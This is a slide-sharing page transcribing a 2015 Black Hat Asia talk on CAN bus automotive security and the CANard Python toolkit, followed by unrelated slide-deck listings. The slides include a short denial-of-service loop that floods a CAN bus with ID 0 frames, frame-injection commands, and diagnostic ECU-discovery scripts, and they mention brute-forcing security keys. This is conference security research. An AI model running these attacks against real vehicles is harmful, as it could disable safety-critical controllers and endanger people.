hopping on the can bus
play

Hopping On the CAN Bus Automotive Security and the CANard Toolkit - PowerPoint PPT Presentation

May 23, 2023 •16 likes •326 views

Hopping On the CAN Bus Automotive Security and the CANard Toolkit Eric Evenchick Black Hat Asia 2015 What is CAN? Controller Area Network Low cost, integrated controllers Types: High speed (differential) Low speed (single

  1. Hopping On the CAN Bus Automotive Security and the CANard Toolkit Eric Evenchick Black Hat Asia 2015

  2. What is CAN? • Controller Area Network • Low cost, integrated controllers • Types: • High speed (differential) • Low speed (single ended) • Fault Tolerant • CAN FD

  3. Why do I care? • Used in: • Industrial Control Systems • SCADA • Pretty much every car • Direct interface with controllers

  4. How CAN Works • Bus : collection of collected controllers • Frame : a single CAN ‘packet’ consisting of: • Identifier - What is this message? • Data Length Code - How long is the data? • Data - What does it say?

  5. How CAN Works

  6. Easy Attacks - DoS while (1) { • Hardware Arbitration send_message_with_id_0(); • Lowest ID wins }

  7. How CAN Works Message Structure

  8. How CAN Works Message Structure

  9. Easy Attacks - Injection • “Trusted” network • All traffic is visible to all controllers • Any controller can send any message

  10. Easy Attacks - Injection

  12. Getting on the Bus • Hardware • USB to CAN • Software • Send and Receive Messages • Encode and Decode Data

  13. CAN Hardware • $$$$ - Vector, Kvaser • $$$ - Peak/GridConnect, ECOMCable • $$ - GoodThopter, OBDuino, CANtact • $ - ELM327 knockoffs (OBD-II)

  14. CAN Software • Proprietary Tools • SocketCAN & canutils • Wireshark • CANard

  15. SocketCAN ifconfig can0 up • CAN to Unix Network Interface cansend can0 123#112233 candump can0 • Included in Linux kernel cangen can0

  16. Wireshark • Trace CAN traffic • Filter, log, sort, etc…

  17. CANard A Python Toolkit for CAN • Hardware Abstraction • Protocol Implementation • Ease of Automation • Sharing of Information

  18. Hardware Abstraction from canard import can from canard.hw import socketcan # create a SocketCAN device dev = socketcan.SocketCanDev('can0') • Hardware devices as classes # start the device dev.start() • dev.start() # create a CAN frame frame = can.Frame(id=0x100) • dev.stop() frame.dlc = 8 frame.data = [1,2,3,4,5,6,7,8] # send the frame • dev.send() dev.send(frame) # receive a frame • dev.recv() frame = dev.recv() # stop the device dev.stop()

  19. DoS Example from canard import can from canard.hw import cantact # create and start device dev = cantact.CantactDev('/dev/cu.usbmodem14514') dev.start() # create our payload frame frame = can.Frame(id=0) frame.dlc = 8 # spam! while True: dev.send(frame)

  20. Diagnostics Protocols • OBD-II • Unified Diagnostic Services

  21. OBD-II • Read basic data • Engine RPM • Vehicle Speed • Throttle Position • Read Fault Codes • Clear Fault Codes

  22. Unified Diagnostic Services • ISO 14229 • Allows diagnostic access to controllers

  23. Unified Diagnostic Services

  24. Unified Diagnostic Services • SecurityAccess • RoutineControl • ReadDataByIdentifier • WriteDataByIdentifier • ReadMemoryByAddress • WriteMemoryByAddress

  25. UDS With CANard import sys from canard.proto.uds import UdsInterface from canard.hw.cantact import CantactDev d = CantactDev(sys.argv[1]) d.set_bitrate(500000) d.start() p = UdsInterface(d) # DiagnosticSessionControl Discovery for i in range(0x700, 0x800): # attempt to enter diagnostic session resp = p.uds_request(i, 0x10, [0x1], timeout=0.2) if resp != None: print ("ECU response for ID 0x%X!" % i)

  26. UDS SecurityAccess • Provides access to protected services Fixed! • Firmware upload 16 bits! • Modifying certain Fixed! variables

  27. Fuzzing Diagnostics • Automated Controller Discovery • Device Memory Mapping • Memory Dump • Determine Memory Permissions • RoutineControl Discovery • SecurityAccess Key Brute Force

  28. ECU AutoDiscovery import sys from canard.proto.uds import UdsInterface from canard.hw.cantact import CantactDev d = CantactDev(sys.argv[1]) d.set_bitrate(500000) d.start() Honda: p = UdsInterface(d) ECU Response for ID 0x740! # DiagnosticSessionControl Discovery for i in range(0x700, 0x800): # attempt to enter diagnostic session resp = p.uds_request(i, 0x10, [0x1], timeout=0.2) if resp != None: print ("ECU response for ID 0x%X!" % i)

  29. Conclusions • CAN Bus Attacks • Denial of Service • Injection • Diagnostics

  30. Conclusions • You will need • Hardware Interface • CANtact • Software Tools • CANard • Wireshark

  31. Thank you! Questions? http://github.com/ericevenchick/canard http://cantact.io @ericevenchick

Recommend

School Improvement Plan Island Hopping 2016-17 Strategy Islands Shoreline - The SIP Map

School Improvement Plan Island Hopping 2016-17 Strategy Islands Shoreline - The SIP Map

School Improvement Plan Island Hopping 2016-17 Strategy Islands Shoreline - The SIP Map Charting the Course between islands, as opposed to a single journey directly to the destination. School Improvement Process Island hopping is the

418 views • 21 slides
Unraveling functional hole hopping pathways in the [4Fe4S]-containing DNA primase B Blue

Unraveling functional hole hopping pathways in the [4Fe4S]-containing DNA primase B Blue

Unraveling functional hole hopping pathways in the [4Fe4S]-containing DNA primase B Blue ue Wat aters rs has has enabl nabled d me me to de develop p forc rce field d parame parameters rs for r 3+ cl [F [Fe 4 S 4 ] 2+

521 views • 23 slides
Fat Heads Brewery Dry Hopping Techniques and Technology Hop Cannon is prepped and ready, hops

Fat Heads Brewery Dry Hopping Techniques and Technology Hop Cannon is prepped and ready, hops

Fat Heads Brewery Dry Hopping Techniques and Technology Hop Cannon is prepped and ready, hops are out of the box. CO2 is hooked up on the front port at the bottom. Close up of CO2 connection. Creates CO2 Blanket for loading hops.

324 views • 20 slides
Advanced techniques: Quantum treatment of nuclei and non-adiabatic (surface hopping) approaches

Advanced techniques: Quantum treatment of nuclei and non-adiabatic (surface hopping) approaches

Advanced techniques: Quantum treatment of nuclei and non-adiabatic (surface hopping) approaches Mauro Boero Institut de Physique et Chimie des Matriaux de Strasbourg University of Strasbourg - CNRS, F-67034 Strasbourg, France and @Institute

496 views • 39 slides
Single Legged Hopping Robot Noe Gonzalez Santa Barbara City College Electrical Engineering

Single Legged Hopping Robot Noe Gonzalez Santa Barbara City College Electrical Engineering

Spring Loaded Inverted Pendulum Single Legged Hopping Robot Noe Gonzalez Santa Barbara City College Electrical Engineering Mentor, Giulia Piovan Faculty Advisor, Dr. KaAe Byl ANewGenerationofRobots

200 views • 18 slides
Casino S hopping Events: Do s and Don ts Gary Galonek, National Sales Manager, Gaming

Casino S hopping Events: Do s and Don ts Gary Galonek, National Sales Manager, Gaming

Casino S hopping Events: Do s and Don ts Gary Galonek, National Sales Manager, Gaming (Principal) April 3-6, 2011 Starting 9 Considerations for Hosting a Casino Shopping Event 1. Timing a. Tie in with previously scheduled casino event

70 views • 6 slides
On line Power Optimization of Data Flow Multi-Core Architecture based on Vdd-Hopping for Local

On line Power Optimization of Data Flow Multi-Core Architecture based on Vdd-Hopping for Local

PATMOS 2010, Grenoble, France 20th Int. Workshop on Power And Timing Modeling, Optimization and Simulation On line Power Optimization of Data Flow Multi-Core Architecture based on Vdd-Hopping for Local DVFS Pascal Vivet 1 , Edith Beigne 1 , Hugo

749 views • 22 slides
Assisted hopping models of the active -absorbing state transition on a line Deepak Dhar Tata

Assisted hopping models of the active -absorbing state transition on a line Deepak Dhar Tata

Assisted hopping models of the active -absorbing state transition on a line Deepak Dhar Tata Institute of Fundamental Research Mumbai, INDIA G.G.I.T.P., Firenze, May 2014 Work done with Rahul Dandekar Published in R. Dandekar and DD,

207 views • 20 slides
Channel Assignment and Channel Hopping in IEEE 802.11 Operating Channels for 802.11b Europe

Channel Assignment and Channel Hopping in IEEE 802.11 Operating Channels for 802.11b Europe

Channel Assignment and Channel Hopping in IEEE 802.11 Operating Channels for 802.11b Europe (ETSI) channel 1 channel 7 channel 13 2400 2412 2442 2472 2483.5 [MHz] 22 MHz US (FCC)/Canada (IC) channel 1 channel 6 channel 11 2400

572 views • 44 slides
HotSpot: Automated Server Hopping in Cloud Spot Markets Supreeth Shastri and David Irwin

HotSpot: Automated Server Hopping in Cloud Spot Markets Supreeth Shastri and David Irwin

HotSpot: Automated Server Hopping in Cloud Spot Markets Supreeth Shastri and David Irwin Transient Servers are Ubiquitous in the Cloud Servers that may terminate anytime after an advance warning period Internal Use : Resource Spot Instances :

304 views • 17 slides
Ballisticity and Einstein relation in 1d Mott variable range hopping Alessandra Faggionato

Ballisticity and Einstein relation in 1d Mott variable range hopping Alessandra Faggionato

Ballisticity and Einstein relation in 1d Mott variable range hopping Alessandra Faggionato Department of Mathematics University La Sapienza Joint work with N. Gantert and M. Salvi Alessandra Faggionato Ballisticity and Einstein relation in

560 views • 28 slides
Spread Spectrum Concept Frequency Hopping Spread Spectrum Direct Sequence Spread

Spread Spectrum Concept Frequency Hopping Spread Spectrum Direct Sequence Spread

CMPE 477 Wireless and Mobile Networks Lecture 6: Spread Spectrum Concept Frequency Hopping Spread Spectrum Direct Sequence Spread Spectrum CMPE 477 Spread Spectrum Problem of radio transmission: frequency dependent fading can

656 views • 17 slides
Air Quality Hot Topics Florida Chambers 28 th Annual Environmental Permitting Summer

Air Quality Hot Topics Florida Chambers 28 th Annual Environmental Permitting Summer

Air Quality Hot Topics Florida Chambers 28 th Annual Environmental Permitting Summer School July 22-25, 2014 Marco Island, FL Robert A. Manning Hopping Green & Sams, P. A. Robert A. Manning Hop Hopping ing Green Green &

840 views • 80 slides
THE CAPE VERDE ARCHIPELAGO 2019-20 ISLAND HOPPING CRUISES IN VOLCANIC & VIBRANT LOCALES Aboard

THE CAPE VERDE ARCHIPELAGO 2019-20 ISLAND HOPPING CRUISES IN VOLCANIC & VIBRANT LOCALES Aboard

THE CAPE VERDE ARCHIPELAGO 2019-20 ISLAND HOPPING CRUISES IN VOLCANIC & VIBRANT LOCALES Aboard the 25-cabin M/Y Harmony V November December 2019 & March 2020 | 8-day cruises from Sal, Palmeira A cruise voyage the archipelago of Cape

342 views • 5 slides
Energy and Environmental Protection Backyard Exploration Series Spring is hopping! Connecticut

Energy and Environmental Protection Backyard Exploration Series Spring is hopping! Connecticut

Connecticut Department of Energy and Environmental Protection Backyard Exploration Series Spring is hopping! Connecticut Department of Energy and Environmental Protection Frogs are amphibians so they. Are true in ponds, streams and

320 views • 10 slides
Hopping in Medicinal Chemistry Nathan Brown Group Leader, In Silico Medicinal Chemistry Cancer

Hopping in Medicinal Chemistry Nathan Brown Group Leader, In Silico Medicinal Chemistry Cancer

in partnership with Bioisosteres and Scaffold Hopping in Medicinal Chemistry Nathan Brown Group Leader, In Silico Medicinal Chemistry Cancer Research UK Cancer Therapeutics Unit Division of Cancer Therapeutics The Institute of Cancer

575 views • 36 slides
Island Hopping and Path Colouring Andrew McGregor UPenn UC San Diego Bruce Shepherd Bell Labs

Island Hopping and Path Colouring Andrew McGregor UPenn UC San Diego Bruce Shepherd Bell Labs

Island Hopping and Path Colouring Andrew McGregor UPenn UC San Diego Bruce Shepherd Bell Labs McGill Optical Network Design Optical Network Design Route a set of signals, s i to t i , in a graph G Optical Network Design Route a

875 views • 65 slides
Learning invariance with a large number of objects Recognizing from one example = ? No

Learning invariance with a large number of objects Recognizing from one example = ? No

P ATTERN R ECOGNITION FROM O NE E XAMPLE BY C HOPPING Franc ois Fleuret EPFL LCN / CVLAB Gilles Blanchard Fraunhofer FIRST 1 R ECOGNITION FROM O NE E XAMPLE Given a single training example, find the same object in the test images:

275 views • 25 slides
1 Frequency Hopping Spread Spectrum (FHSS) Basic Operation Typically 2 k carriers

1 Frequency Hopping Spread Spectrum (FHSS) Basic Operation Typically 2 k carriers

William Stallings Spread Spectrum Data and Computer Communications Analog or digital data 7 th Edition Analog signal Spread data over wide bandwidth Makes jamming and interception harder Chapter 9 Frequency hoping

380 views • 5 slides
Optical lattice clock Tetsuya Ido ( ) National Institute of Information and

Optical lattice clock Tetsuya Ido ( ) National Institute of Information and

Optical lattice clock Tetsuya Ido ( ) National Institute of Information and Communications Technology (NICT) 1 Personal research background Ph. D thesis in 98 in Tokyo (Prof. Shimizu) Dynamics of cite hopping processes

584 views • 30 slides
Chemspace Virtual Screening Set Description Virtual screening (VS) has been a tool to identify

Chemspace Virtual Screening Set Description Virtual screening (VS) has been a tool to identify

Chemspace Virtual Screening Set Description Virtual screening (VS) has been a tool to identify primary hits, to study structure-activity relationship, and to tweak the structures using scaffold hopping, to name a few. VS enables screening

259 views • 7 slides
17 Chapter: The Uplink physical resource Uplink reference signals Uplink L1/L2

17 Chapter: The Uplink physical resource Uplink reference signals Uplink L1/L2

3G Evolution Chapter 17 Outline 17 Chapter: The Uplink physical resource Uplink reference signals Uplink L1/L2 control signaling Uplink transmission scheme Uplink transport-channel processing PUSCH frequency hopping

676 views • 12 slides
(Abelian) Anyon-Hubbard Models in 1D (Optical) Lattices I. (Floquet) Engineering with cold

(Abelian) Anyon-Hubbard Models in 1D (Optical) Lattices I. (Floquet) Engineering with cold

(Abelian) Anyon-Hubbard Models in 1D (Optical) Lattices I. (Floquet) Engineering with cold atomic quantum gases: Interaction modulation & Raman assisted hopping II. Lattice shaking & Properties (ground state phase diagram and

1.29k views • 73 slides
Straight-Legged Bipeded Robot David Bayani Background Studied a lot, by primarily but

Straight-Legged Bipeded Robot David Bayani Background Studied a lot, by primarily but

Verifying Safety for a Hopping, Straight-Legged Bipeded Robot David Bayani Background Studied a lot, by primarily but controls examined separately from dynamics Testing controller and machine usually done by simulation or real-life

810 views • 12 slides

More recommend